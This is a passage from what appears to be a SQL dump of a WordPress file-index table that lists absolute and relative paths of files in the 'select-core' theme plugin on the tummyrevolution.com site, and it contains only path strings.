class.wordpress-importer.php'),(3467,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/import/parsers.php','wp-content/plugins/select-core/import/parsers.php'),(3468,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/import/qodef-import-functions.php','wp-content/plugins/select-core/import/qodef-import-functions.php'),(3469,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/import/qodef-import.php','wp-content/plugins/select-core/import/qodef-import.php'),(3470,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/lib/google-fonts.php','wp-content/plugins/select-core/lib/google-fonts.php'),(3471,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/lib/helpers-functions.php','wp-content/plugins/select-core/lib/helpers-functions.php'),(3472,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/lib/post-type-interface.php','wp-content/plugins/select-core/lib/post-type-interface.php'),(3473,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/lib/shortcode-interface.php','wp-content/plugins/select-core/lib/shortcode-interface.php'),(3474,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/lib/shortcode-loader.php','wp-content/plugins/select-core/lib/shortcode-loader.php'),(3475,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/load.php','wp-content/plugins/select-core/load.php'),(3476,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/main.php','wp-content/plugins/select-core/main.php'),(3477,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/admin/meta-boxes/portfolio-categories-meta-boxes.php','wp-content/plugins/select-core/post-types/portfolio/admin/meta-boxes/portfolio-categories-meta-boxes.php'),(3478,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/admin/meta-boxes/portfolio-meta-boxes.php','wp-content/plugins/select-core/post-types/portfolio/admin/meta-boxes/portfolio-meta-boxes.php'),(3479,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/admin/meta-boxes/portfolio-settings-meta-boxes.php','wp-content/plugins/select-core/post-types/portfolio/admin/meta-boxes/portfolio-settings-meta-boxes.php'),(3480,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/admin/options/portfolio-options-map.php','wp-content/plugins/select-core/post-types/portfolio/admin/options/portfolio-options-map.php'),(3481,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/assets/js/modules/portfolio.js','wp-content/plugins/select-core/post-types/portfolio/assets/js/modules/portfolio.js'),(3482,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/helper-functions.php','wp-content/plugins/select-core/post-types/portfolio/helper-functions.php'),(3483,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/load.php','wp-content/plugins/select-core/post-types/portfolio/load.php'),(3484,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/portfolio-register.php','wp-content/plugins/select-core/post-types/portfolio/portfolio-register.php'),(3485,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/assets/js/modules/portfolio-list.js','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/assets/js/modules/portfolio-list.js'),(3486,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/helper-functions.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/helper-functions.php'),(3487,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/load.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/load.php'),(3488,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/portfolio-list.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/portfolio-list.php'),(3489,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/layout-collections/gallery-overlay.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/layout-collections/gallery-overlay.php'),(3490,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/layout-collections/gallery-slide-from-image-bottom.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/layout-collections/gallery-slide-from-image-bottom.php'),(3491,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/layout-collections/standard-shader.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/layout-collections/standard-shader.php'),(3492,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/pagination/infinite-scroll.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/pagination/infinite-scroll.php'),(3493,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/pagination/load-more.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/pagination/load-more.php'),(3494,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/pagination/no-pagination.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/pagination/no-pagination.php'),(3495,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/pagination/standard.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/pagination/standard.php'),(3496,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/category.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/category.php'),(3497,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/excerpt.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/excerpt.php'),(3498,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/filter.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/filter.php'),(3499,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/image-gallery.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/image-gallery.php'),(3500,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/image.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/image.php'),(3501,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/images-count.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/images-count.php'),(3502,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/posts-not-found.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/posts-not-found.php'),(3503,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/title.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/title.php'),(3504,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-holder-masonry.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-holder-masonry.php'),(3505,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-holder.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-holder.php'),(3506,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-item-gallery.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-item-gallery.php'),(3507,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-item.php','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-item.php'),(3508,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/archive-portfolio-item.php','wp-content/plugins/select-core/post-types/portfolio/templates/archive-portfolio-item.php'),(3509,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/holder-full-width-custom.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/holder-full-width-custom.php'),(3510,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/holder-huge-images.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/holder-huge-images.php'),(3511,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/holder.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/holder.php'),(3512,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/custom.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/custom.php'),(3513,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/full-width-custom.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/full-width-custom.php'),(3514,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/gallery.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/gallery.php'),(3515,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/huge-images.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/huge-images.php'),(3516,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/images.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/images.php'),(3517,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/masonry.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/masonry.php'),(3518,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/slider.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/slider.php'),(3519,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-gallery.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-gallery.php'),(3520,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-images.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-images.php'),(3521,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-masonry.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-masonry.php'),(3522,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-slider.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-slider.php'),(3523,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/media/image.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/media/image.php'),(3524,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/media/self.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/media/self.php'),(3525,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/media/vimeo.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/media/vimeo.php'),(3526,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/media/youtube.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/media/youtube.php'),(3527,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/categories.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/categories.php'),(3528,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/comments.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/comments.php'),(3529,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/content.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/content.php'),(3530,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/custom-fields.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/custom-fields.php'),(3531,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/date.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/date.php'),(3532,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/navigation.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/navigation.php'),(3533,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/related-posts.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/related-posts.php'),(3534,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/social.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/social.php'),(3535,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/tags.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/tags.php'),(3536,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/title.php','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/title.php'),(3537,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single-portfolio-item.php','wp-content/plugins/select-core/post-types/portfolio/templates/single-portfolio-item.php'),(3538,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/post-types-functions.php','wp-content/plugins/select-core/post-types/post-types-functions.php'),(3539,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/post-types-register.php','wp-content/plugins/select-core/post-types/post-types-register.php'),(3540,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/admin/meta-boxes/team-meta-boxes.php','wp-content/plugins/select-core/post-types/team/admin/meta-boxes/team-meta-boxes.php'),(3541,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/helper-functions.php','wp-content/plugins/select-core/post-types/team/helper-functions.php'),(3542,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/load.php','wp-content/plugins/select-core/post-types/team/load.php'),(3543,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-list/helper-functions.php','wp-content/plugins/select-core/post-types/team/shortcodes/team-list/helper-functions.php'),(3544,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-list/load.php','wp-content/plugins/select-core/post-types/team/shortcodes/team-list/load.php'),(3545,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-list/team-list.php','wp-content/plugins/select-core/post-types/team/shortcodes/team-list/team-list.php'),(3546,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-list/templates/team-holder.php','wp-content/plugins/select-core/post-types/team/shortcodes/team-list/templates/team-holder.php'),(3547,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-member/helper-functions.php','wp-content/plugins/select-core/post-types/team/shortcodes/team-member/helper-functions.php'),(3548,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-member/load.php','wp-content/plugins/select-core/post-types/team/shortcodes/team-member/load.php'),(3549,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-member/team-member.php','wp-content/plugins/select-core/post-types/team/shortcodes/team-member/team-member.php'),(3550,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-member/templates/info-bellow.php','wp-content/plugins/select-core/post-types/team/shortcodes/team-member/templates/info-bellow.php'),(3551,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/team-register.php','wp-content/plugins/select-core/post-types/team/team-register.php'),(3552,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/templates/archive-team-member.php','wp-content/plugins/select-core/post-types/team/templates/archive-team-member.php'),(3553,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/templates/single/holder.php','wp-content/plugins/select-core/post-types/team/templates/single/holder.php'),(3554,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/templates/single/parts/content.php','wp-content/plugins/select-core/post-types/team/templates/single/parts/content.php'),(3555,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/templates/single/parts/info.php','wp-content/plugins/select-core/post-types/team/templates/single/parts/info.php'),(3556,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/templates/single-team-member.php','wp-content/plugins/select-core/post-types/team/templates/single-team-member.php'),(3557,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/admin/meta-boxes/testimonials-meta-boxes.php','wp-content/plugins/select-core/post-types/testimonials/admin/meta-boxes/testimonials-meta-boxes.php'),(3558,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/helper-functions.php','wp-content/plugins/select-core/post-types/testimonials/helper-functions.php'),(3559,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/load.php','wp-content/plugins/select-core/post-types/testimonials/load.php'),(3560,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/helper-functions.php','wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/helper-functions.php'),(3561,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/load.php','wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/load.php'),(3562,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/templates/testimonials-standard.php','wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/templates/testimonials-standard.php'),(3563,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/testimonials.php','wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/testimonials.php'),(3564,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/testimonials-register.php','wp-content/plugins/select-core/post-types/testimonials/testimonials-register.php'),(3565,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/accordion-tab.php','wp-content/plugins/select-core/shortcodes/accordions/accordion-tab.php'),(3566,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/accordion.php','wp-content/plugins/select-core/shortcodes/accordions/accordion.php'),(3567,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/assets/js/modules/accordions.js','wp-content/plugins/select-core/shortcodes/accordions/assets/js/modules/accordions.js'),(3568,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/functions.php','wp-content/plugins/select-core/shortcodes/accordions/functions.php'),(3569,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/load.php','wp-content/plugins/select-core/shortcodes/accordions/load.php'),(3570,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/templates/accordion-holder-template.php','wp-content/plugins/select-core/shortcodes/accordions/templates/accordion-holder-template.php'),(3571,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/templates/accordion-template.php','wp-content/plugins/select-core/shortcodes/accordions/templates/accordion-template.php'),(3572,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/animation-holder/animation-holder.php','wp-content/plugins/select-core/shortcodes/animation-holder/animation-holder.php'),(3573,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/animation-holder/assets/js/modules/animation-holder.js','wp-content/plugins/select-core/shortcodes/animation-holder/assets/js/modules/animation-holder.js'),(3574,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/animation-holder/functions.php','wp-content/plugins/select-core/shortcodes/animation-holder/functions.php'),(3575,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/animation-holder/load.php','wp-content/plugins/select-core/shortcodes/animation-holder/load.php'),(3576,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/banner/banner.php','wp-content/plugins/select-core/shortcodes/banner/banner.php'),(3577,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/banner/functions.php','wp-content/plugins/select-core/shortcodes/banner/functions.php'),(3578,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/banner/load.php','wp-content/plugins/select-core/shortcodes/banner/load.php'),(3579,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/banner/templates/banner.php','wp-content/plugins/select-core/shortcodes/banner/templates/banner.php'),(3580,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/assets/js/modules/button.js','wp-content/plugins/select-core/shortcodes/button/assets/js/modules/button.js'),(3581,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/button.php','wp-content/plugins/select-core/shortcodes/button/button.php'),(3582,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/functions.php','wp-content/plugins/select-core/shortcodes/button/functions.php'),(3583,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/load.php','wp-content/plugins/select-core/shortcodes/button/load.php'),(3584,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/templates/anchor.php','wp-content/plugins/select-core/shortcodes/button/templates/anchor.php'),(3585,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/templates/button.php','wp-content/plugins/select-core/shortcodes/button/templates/button.php'),(3586,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/templates/input.php','wp-content/plugins/select-core/shortcodes/button/templates/input.php'),(3587,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/call-to-action/call-to-action.php','wp-content/plugins/select-core/shortcodes/call-to-action/call-to-action.php'),(3588,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/call-to-action/functions.php','wp-content/plugins/select-core/shortcodes/call-to-action/functions.php'),(3589,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/call-to-action/load.php','wp-content/plugins/select-core/shortcodes/call-to-action/load.php'),(3590,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/call-to-action/templates/call-to-action.php','wp-content/plugins/select-core/shortcodes/call-to-action/templates/call-to-action.php'),(3591,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/clients-carousel/clients-carousel-item.php','wp-content/plugins/select-core/shortcodes/clients-carousel/clients-carousel-item.php'),(3592,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/clients-carousel/clients-carousel.php','wp-content/plugins/select-core/shortcodes/clients-carousel/clients-carousel.php'),(3593,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/clients-carousel/functions.php','wp-content/plugins/select-core/shortcodes/clients-carousel/functions.php'),(3594,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/clients-carousel/load.php','wp-content/plugins/select-core/shortcodes/clients-carousel/load.php'),(3595,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/clients-carousel/templates/clients-carousel-item.php','wp-content/plugins/select-core/shortcodes/clients-carousel/templates/clients-carousel-item.php'),(3596,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/clients-carousel/templates/clients-carousel.php','wp-content/plugins/select-core/shortcodes/clients-carousel/templates/clients-carousel.php'),(3597,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/countdown/assets/js/modules/countdown.js','wp-content/plugins/select-core/shortcodes/countdown/assets/js/modules/countdown.js'),(3598,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/countdown/assets/js/plugins/jquery.countdown.min.js','wp-content/plugins/select-core/shortcodes/countdown/assets/js/plugins/jquery.countdown.min.js'),(3599,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/countdown/countdown.php','wp-content/plugins/select-core/shortcodes/countdown/countdown.php'),(3600,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/countdown/functions.php','wp-content/plugins/select-core/shortcodes/countdown/functions.php'),(3601,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/countdown/load.php','wp-content/plugins/select-core/shortcodes/countdown/load.php'),(3602,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/countdown/templates/countdown.php','wp-content/plugins/select-core/shortcodes/countdown/templates/countdown.php'),(3603,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/assets/js/modules/counter.js','wp-content/plugins/select-core/shortcodes/counter/assets/js/modules/counter.js'),(3604,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/assets/js/plugins/absoluteCounter.min.js','wp-content/plugins/select-core/shortcodes/counter/assets/js/plugins/absoluteCounter.min.js'),(3605,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/assets/js/plugins/counter.js','wp-content/plugins/select-core/shortcodes/counter/assets/js/plugins/counter.js'),(3606,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/counter.php','wp-content/plugins/select-core/shortcodes/counter/counter.php'),(3607,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/functions.php','wp-content/plugins/select-core/shortcodes/counter/functions.php'),(3608,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/load.php','wp-content/plugins/select-core/shortcodes/counter/load.php'),(3609,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/templates/counter.php','wp-content/plugins/select-core/shortcodes/counter/templates/counter.php'),(3610,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/custom-font/assets/js/modules/custom-font.js','wp-content/plugins/select-core/shortcodes/custom-font/assets/js/modules/custom-font.js'),(3611,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/custom-font/assets/js/plugins/typed.js','wp-content/plugins/select-core/shortcodes/custom-font/assets/js/plugins/typed.js'),(3612,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/custom-font/custom-font.php','wp-content/plugins/select-core/shortcodes/custom-font/custom-font.php'),(3613,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/custom-font/functions.php','wp-content/plugins/select-core/shortcodes/custom-font/functions.php'),(3614,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/custom-font/load.php','wp-content/plugins/select-core/shortcodes/custom-font/load.php'),(3615,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/custom-font/templates/custom-font.php','wp-content/plugins/select-core/shortcodes/custom-font/templates/custom-font.php'),(3616,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/dropcaps/dropcaps.php','wp-content/plugins/select-core/shortcodes/dropcaps/dropcaps.php'),(3617,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/dropcaps/functions.php','wp-content/plugins/select-core/shortcodes/dropcaps/functions.php'),(3618,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/dropcaps/load.php','wp-content/plugins/select-core/shortcodes/dropcaps/load.php'),(3619,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/dropcaps/templates/dropcaps-template.php','wp-content/plugins/select-core/shortcodes/dropcaps/templates/dropcaps-template.php'),(3620,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/elements-holder/assets/js/modules/elements-holder.js','wp-content/plugins/select-core/shortcodes/elements-holder/assets/js/modules/elements-holder.js'),(3621,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/elements-holder/elements-holder-item.php','wp-content/plugins/select-core/shortcodes/elements-holder/elements-holder-item.php'),(3622,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/elements-holder/elements-holder.php','wp-content/plugins/select-core/shortcodes/elements-holder/elements-holder.php'),(3623,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/elements-holder/